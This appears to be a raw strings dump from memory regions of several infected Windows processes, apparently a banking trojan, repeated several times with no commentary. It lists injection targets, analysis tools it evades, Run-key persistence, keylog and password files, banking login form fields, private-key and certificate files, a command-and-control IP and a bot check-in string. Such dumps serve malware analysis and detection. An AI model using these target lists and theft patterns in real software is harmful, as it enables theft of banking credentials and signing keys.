PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1732_rwx_00BE0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

TPAutoConnect.exe_2160_rwx_00390000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

TPAutoConnect.exe_2160_rwx_012E0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_2168_rwx_01150000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

